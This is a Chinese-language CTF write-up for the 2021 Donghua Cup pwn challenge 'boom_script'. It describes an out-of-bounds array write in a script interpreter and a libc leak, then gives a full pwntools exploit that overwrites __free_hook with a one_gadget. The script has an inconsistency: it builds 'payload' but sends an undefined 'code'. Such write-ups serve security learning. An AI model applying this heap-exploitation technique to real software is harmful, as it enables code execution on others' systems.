2021 东华杯 pwn boom_script

2021 东华杯 pwn boom_script
RELRO没开。

2021 东华杯 pwn boom_script
程序本身的逻辑是实现了一个boom语言的编译器,我们输入boom语言会给我们编译。

但是对于我们做题人来讲,因为程序体量太大,我们逆向起来会非常麻烦,所以我们结合他一些可能会出漏洞的地方,进行一些猜测并尝试。

我们最后将漏洞点放在了他的array,也就是数组的地方。
猜测他数组可以造成越界。

我们来检查一下对不对。

我们就简单的

array arr[30];
arr[25]=1;
arr[26]=1;
arr[27]=1;
arr[28]=1;
arr[29]=1;
arr[32]=1;

2021 东华杯 pwn boom_script
我们明显发现有越界,现在的问题就是如何能把这个越界利用起来。

首先我们要再去看一下malloc、free函数是在什么情况下使用的,便于我们使用数组越界进行利用。

2021 东华杯 pwn boom_script

2021 东华杯 pwn boom_script
2021 东华杯 pwn boom_script

2021 东华杯 pwn boom_script
我们结合代码,结合我们的调试我们发现,字符串的赋值功能就是释放掉原来的chunk然后再申请一个chunk。

我们通过阅读代码发现
2021 东华杯 pwn boom_script
程序通过这个地方来决定使用的是什么功能。

我们要注意到prints功能。
2021 东华杯 pwn boom_script注意到prints的功能对应的数字是0x8a

找到实现这个功能的函数
2021 东华杯 pwn boom_script我们可以通过prints一个小字符串,来泄露chunk残留的libc地址。

那么我们的利用过程如下:

通过字符串赋值来获得一个大点的chunk。然后通过prints泄露libc地址
2021 东华杯 pwn boom_script
剩下的我们就正常还是通过赋值得到chunk然后越界写就好了。

exp部分有参考小绿草的大佬,表示感谢!

from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

local = 1
if local:
    r = process('./boom_script')
else:
    r = remote("192.168.40.178",8999)
    
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()

def debug():
    gdb.attach(r)
    pause()
    
def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))


payload = ""
payload += "array a[1];"
payload += "array b[1];"
payload += "str=\""+"a"*0x500+"\";"
payload += "str=\""+"a"*0x800+"\";"
payload += "prints(\" \");"
payload += "libc_base=0;"
payload += "inputn(libc_base);"
payload += "free_hook=libc_base+"+str(0x18c8)+";"
payload += "one_gadget=libc_base+"+str(0x4497f)+";"
payload += "str=\""+"a"*0x68+"\";"
payload += "str1=\""+"a"*0x8+"\";"
payload += "str2=\""+"a"*0x8+"\";"
payload += "str2=\""+"a"*0x28+"\";"
payload += "str1=\""+"a"*0x28+"\";"
payload += "a[5]=free_hook;"
payload += "str3=\""+"a"*0x8+"\";"
payload += "array c[0];"
payload += "c[0]=one_gadget;"
payload += "str1=\""+"\x00"*0x8+"\";"

sla("$", "1")
sla("length:\n", str(len(code)))
debug()
sla("code:\n", code)
libc_base = u64(ru('\x7f')[-6:] + '\x00\x00')
lg("libc_base", libc_base)

sd(p64(libc_base))

ti()
上一篇:从0到1上线web项目全流程(和半仙君学的)


下一篇:ctfshow 摆烂杯 pwn